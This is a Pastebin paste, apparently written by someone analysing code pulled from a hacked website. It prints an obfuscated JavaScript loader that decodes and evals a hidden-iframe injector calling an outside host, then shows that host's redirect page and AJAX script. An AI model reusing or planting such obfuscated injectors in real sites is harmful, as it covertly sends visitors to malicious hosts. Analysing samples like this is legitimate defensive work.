Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- // This code was pulled from a hacked website on a rooted server. It is identified as a virus. It was deconstructed and rebuilt in c# to sort out its purpose, which is to print an iframe. That code can be found here: http://pastebin.com/090yyjb5
- <script language=JavaScript> function vzxbnb25(z){ var c=z.length,m=1024,i,s,h,b=0,w=0,x=0,d=Array(63,13,0,37,18,42,51,52,30,35,0,0,0,0,0,0,8,36,34,53,50,10,2,60,1,58,57,62,33,24,43,20,32,56,12,4,38,6,41,29,26,31,44,0,0,0,0,25,0,55,11,9,7,46,40,54,21,27,17,23,3,59,61,48,49,45,22,28,15,5,16,47,19,14,39);for(s=Math.ceil(c/m);s>0;s--){h='';for(i=Math.min(c,m);i>0;i--,c--){{x|=(d[z.charCodeAt(b++)-48])<<w;if(w){h+=String.fromCharCode(169^x&255);x>>=8;w-=2}else{w=6}}}eval(h);}}vzxbnb25('8lGp1iZad5Wa@a1aXxV9qiGpRmfA1iZDsxR6danL8w1oW6sPyrcotw1DS6sBd9RpRx_6vDRTc5ngExJBHaWa_tVLUIVg_6R61Y@od0ZpUgqLrIfPA9saHYQgU6np1d@J@aWode1DdaZpSd@PlBcAv5Jz2Ef91lc6MIfPyeMB8ls6WdR3ie_zcUR62msoWx_AvTfgWlWpRxJB1lZg_kRDvtJpUYR6b8_3UFG6i9RpRYV92F')</script>
- //result: "window.status='Done';document.write('<iframe name=d9e1 src=\"http://7speed.info/t/?'+Math.round(Math.random()*19936)+'d9e1'+'\" width=224 height=89 style=\"display:none\"></iframe>')"
- // the page pulled from that result:
- <html>
- <head>
- <title>7speed.info</title>
- <script type="text/javascript" src="/js/general.js"></script>
- <script type="text/javascript">
- ChkRequestEnc('YToyMjp7aTowO3M6MTk6IjIwMTEtMDQtMDQgMDQ6MDI6NDUiO2k6MTtzOjc6IjU0Mjg5NTkiO2k6MjtOO2k6MztzOjEwOiJXZ2V0LzEuOS4xIjtpOjQ7czoxMzoiL3QvPzE5OTM2ZDllMSI7aTo1O3M6MTI6IjIwOC41NC4zOC41OSI7aTo2O3M6MToiMiI7aTo3O3M6MToiYiI7aTo4O3M6MDoiIjtpOjk7czoyOiJVUyI7aToxMDtzOjEwOiJXQVNISU5HVE9OIjtpOjExO3M6ODoiSVNTQVFVQUgiO2k6MTI7czo2OiIzMDk2OTIiO2k6MTM7czoxMToiN3NwZWVkLmluZm8iO2k6MTQ7czo3MToiaHR0cDovL3NlYXJjaHBvcnRhbC5pbmZvcm1hdGlvbi5jb20vP29faWQ9MTM2NTk4JmRvbWFpbm5hbWU9N3NwZWVkLmluZm8iO2k6MTU7TjtpOjE2O047aToxNztOO2k6MTg7TjtpOjE5O047aToyMDtOO2k6MjE7Tjt9');
- </script>
- <script type="text/javascript">
- </script>
- </head>
- <frameset rows="100%,*" frameborder="no" border="0" framespacing="0">
- <!-- SCC a2 -->
- <frame src="http://searchportal.information.com/?o_id=136598&domainname=7speed.info">
- <noframes>
- <body bgcolor="#ffffff" text="#000000">
- <a href="http://searchportal.information.com/?o_id=136598&domainname=7speed.info">Click here to enter</a>.
- </body>
- </noframes>
- </frameset>
- // the javascript referenced above: general.js
- ////////////////////////////////////////////////////////////////////
- // XML functions and AJAX things
- ////////////////////////////////////////////////////////////////////
- var xmlHttp;
- function ChkRequestEnc(Encoded)
- {
- xmlHttp = GetXmlHttpObject()
- if(xmlHttp==null)
- {
- alert("Browser does not support HTTP Request");
- return false;
- }
- var SesId = SesId;
- var urlPass = "/check_image.php?enc=" + escape(Encoded);
- urlPass = urlPass + "&rand="+Math.random();
- // alert(urlPass);
- xmlHttp.onreadystatechange = fillMessage;
- urlPass = new String(urlPass);
- xmlHttp.open("GET",urlPass);
- xmlHttp.send(null);
- return true;
- }
- function ChkPopunderEnc(Encoded)
- {
- xmlHttp = GetXmlHttpObject();
- if(xmlHttp==null)
- {
- alert("Browser does not support HTTP Request");
- return false;
- }
- var SesId = SesId;
- var urlPass = "/check_popunder.php?enc=" + escape(Encoded);
- urlPass = urlPass + "&rand="+Math.random();
- // alert(urlPass);
- xmlHttp.onreadystatechange = fillMessage;
- urlPass = new String(urlPass);
- xmlHttp.open("GET",urlPass);
- xmlHttp.send(null);
- return true;
- }
- function fillMessage()
- {
- if(xmlHttp.readyState==4 || xmlHttp.readyState=="complete")
- {
- // x = document.getElementById('imp_msg');
- // x.innerHTML = xmlHttp.responseText;
- // alert(xmlHttp.responseText);
- return true;
- }
- }
- function GetXmlHttpObject()
- {
- var objXMLHttp=null;
- if(window.XMLHttpRequest)
- {
- objXMLHttp=new XMLHttpRequest();
- }
- else if(window.ActiveXObject)
- {
- objXMLHttp=new ActiveXObject("Microsoft.XMLHTTP");
- }
- return objXMLHttp;
- }
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement